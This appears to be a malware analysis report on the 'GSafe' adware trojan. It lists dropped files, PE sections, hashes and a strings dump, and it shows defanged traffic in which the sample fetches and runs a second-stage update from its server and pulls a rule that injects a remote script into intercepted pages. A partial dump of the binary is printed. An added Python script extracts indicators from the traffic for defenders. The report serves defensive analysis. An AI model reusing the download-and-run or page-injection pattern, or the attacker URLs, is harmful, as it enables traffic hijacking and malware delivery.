%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (55 bytes)
%Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Program Files%\GSafe\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\nfapi.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GSafe\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 180224 | 2536 | 2560 | 3.13573 | e844fdd69bdbb3983f3935842639207a |
The .ndata section (virtual size 32768, raw size 0) is the signature of an NSIS installer stub, as are the nsXX.tmp plug-in directories with System.dll, nsExec.dll, inetc.dll, SelfDel.dll, UserInfo.dll and SimpleSC.dll dropped at run time; the UPolyX PEiD match is a common false positive on NSIS stubs, and the "Packed" entropy verdict reflects the compressed NSIS payload rather than a separate packer.
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 111
fe19430e206762bb2e9b7a8eda606fd5
85f9955ab6934d697288afd27dc7a58c
b3e92e650e999225a6bcdb3f02de6978
cb4a17cbf388b6948f137d6ebec938a3
d54c4d7cc93b9cd1df7ed6e502496d89
513f348df39c996229766bb0643038d8
c3bbb39ced8892724124da1b0c590e36
ff5fc30bb03f0539b766d88853d3cafc
dcfe26b4d104544bfbca806dd835ee5e
c9ef48ddcc60d7fd75bfbbd11372428f
3c401a3f1acb19112187a86d704428b2
422966a56e088b291ba42264431ed8f5
84896e31abdc7c299ba1cf27c2857e2e
883ea9e858595dfb411cbc9a5d0eb496
2f40b14a6d586464338f1867dc4f6bd2
0605a356bf1c88c1a8b838819afdbb43
7b799bda39cde1f9759fa8c2a79c49cb
edaf8e666446f746cecd150d29a7688f
ca829f86af0a8b02dfa65dbd4d4721c9
e967a0b717d494b8291639d8a0e46344
a848c2b153e8fb4dd27bdaf6dc42e860
75c60a885096fc4cee2e4fa9357044b5
18b197ab50049e884e346f38c4fab398
ea4fd2a497d37e841cbda16b73520c25
1127efcd3bf48bb7b3b4ad29da66bed9
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.gencolabsllc.com/services/hdtv_rules.php | |
hxxp://www.gencolabsllc.com/services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404 | |
hxxp://www.gencolabsllc.com/bin/gsafe_update.exe?dummy=573 | |
hxxp://gencolabsllc.com/bin/gsafe_update.exe?dummy=573 | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
The capture consists of four plaintext HTTP exchanges: the update check (update.php, whose key parameter is the instid value written under HKLM\SOFTWARE\GSafe), which answers with a bare URL; two fetches of the hdtv rule list; and the download of the binary named by that URL, which the client saves as %WinDir%\Temp\nj_update.exe and launches (the dropped-file MD5 of nj_update.exe matches the cached gsafe_update[1]). Nothing in the capture authenticates either the URL or the binary beyond the unencrypted transport.
GET /services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: text/plain
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
hXXp://gencolabsllc.com/bin/gsafe_update.exe..
GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js"></script></head>...
GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js"></script></head>...
GET /bin/gsafe_update.exe?dummy=573 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Last-Modified: Wed, 31 Dec 2014 11:01:01 GMT
ETag: "59c21d0-383c7-50b8105e2f540"
Accept-Ranges: bytes
Content-Length: 230343
X-Cache: BYPASS
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
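The traffic above is a two-step update protocol. The check-in to `update.php` carries the affiliate id (`affid=hdtv`), a build version (`v=1.0.0`) and a per-install `key`; the `text/plain` response body is nothing but the URL of `gsafe_update.exe`, which the client fetches next (the `dummy=` parameter on both requests is a cache-buster). `hdtv_rules.php` returns a `</head>|<script src="...gsafejs.me..."></script></head>` pair, which reads as a search-and-replace rule for inserting a remote script into intercepted HTML; the `nfapi.dll` and `ProtocolFilters.dll` imports in the strings dump further down are the components that would apply it. The block below is an added example, not part of the Lavasoft report: it pulls the beacon parameters, the second-stage URL and the injection rule out of a capture. The capture text is constructed from the exchanges above, reassembled into raw HTTP with header/body separators (the report prints them defanged with `hxxp`/`VVV` and without separators), and the `needle|replacement` reading of the rules response is this example's interpretation, not something the report states.

```python
"""Added example: triage the update.php / hdtv_rules.php exchanges."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the report's traffic; defanged exactly as the report prints it.
CAPTURE = (
    "GET /services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404 HTTP/1.0\r\n"
    "Host: VVV.gencolabsllc.com\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
    "hXXp://gencolabsllc.com/bin/gsafe_update.exe\r\n"
    "GET /services/hdtv_rules.php HTTP/1.0\r\n"
    "Host: VVV.gencolabsllc.com\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    '</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js"></script></head>\r\n'
)

MSG_START = re.compile(r"^(?:(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d|HTTP/\d\.\d (?P<status>\d{3}))")
SCRIPT_SRC = re.compile(r'<script[^>]+src="([^"]+)"', re.I)


def refang(s):
    """Undo the report's defanging so URL parsing works."""
    return re.sub(r"h[xX]{2}p", "http", s).replace("VVV.", "www.")


def defang(s):
    """Re-apply it before anything is written to a ticket."""
    return s.replace("http", "hxxp").replace("www.", "VVV.")


def parse_http(text):
    """Split a textual capture into request and response messages."""
    msgs, cur, in_headers = [], None, False
    for line in text.splitlines():
        m = MSG_START.match(line)
        if m:
            cur = {"method": m["method"], "target": m["target"],
                   "status": m["status"], "headers": {}, "body": []}
            msgs.append(cur)
            in_headers = True
        elif cur is None:
            continue
        elif in_headers:
            if not line.strip():
                in_headers = False          # blank line ends the header block
            elif ":" in line:
                k, v = line.split(":", 1)
                cur["headers"][k.strip().lower()] = v.strip()
        elif line.strip():
            cur["body"].append(line)
    for msg in msgs:
        msg["body"] = "\n".join(msg["body"])
    return msgs


def exchanges(text):
    """Pair each request with the response that follows it."""
    pairs, req = [], None
    for m in parse_http(text):
        if m["method"]:
            req = m
        elif req is not None:
            pairs.append((req, m))
            req = None
    return pairs


def beacon_params(req):
    """affid/v/key identify affiliate, build and install; dummy is a cache-buster."""
    q = parse_qs(urlsplit(req["target"]).query)
    return {k: q.get(k, [None])[0] for k in ("affid", "v", "key", "dummy")}


def parse_rules(body):
    """Each 'needle|replacement' line (assumed format) plus the origins of the
    script tags the replacement injects."""
    rules = []
    for line in body.splitlines():
        if "|" not in line:
            continue
        needle, replacement = line.split("|", 1)
        replacement = refang(replacement)
        origins = sorted({urlsplit(u).netloc for u in SCRIPT_SRC.findall(replacement)})
        rules.append({"needle": needle, "replacement": replacement, "injected_origins": origins})
    return rules


def apply_rules(html, rules):
    """What a victim page looks like once the filter applies the rules
    (first occurrence only; the replacement policy is assumed)."""
    for r in rules:
        html = html.replace(r["needle"], r["replacement"], 1)
    return html


def triage(text):
    """Beacon parameters, second-stage URL, injection rules and defanged IOCs."""
    out = {"beacon": None, "second_stage": None, "rules": [], "iocs": set()}
    for req, resp in exchanges(text):
        out["iocs"].add(refang(req["headers"].get("host", "")))
        path = urlsplit(req["target"]).path
        if path.endswith("/update.php"):
            out["beacon"] = beacon_params(req)
            body = refang(resp["body"].strip())
            if body.startswith("http"):              # response body is the next download
                out["second_stage"] = defang(body)
                out["iocs"].add(urlsplit(body).netloc)
        elif path.endswith("_rules.php"):
            out["rules"] = parse_rules(resp["body"])
            for r in out["rules"]:
                out["iocs"].update(r["injected_origins"])
    out["iocs"] = sorted(defang(i) for i in out["iocs"] if i)
    return out


if __name__ == "__main__":
    for k, v in triage(CAPTURE).items():
        print(k, v)
```

Run against the constructed capture it yields three hosts to block (`gencolabsllc.com` with and without `www.`, and `gsafejs.me`, the script origin that never appears as a direct request from the sample because it is meant to be loaded by the victim's browser), and `apply_rules` shows why that third host matters: every intercepted page gets the remote script before its `</head>`.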
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
GSafe.exe_1268:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.gencolabsllc.com/services/
_rules.php
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start GSafe
cmd.exe /c net stop GSafe
c:\log.log
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
5l6O6W6
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation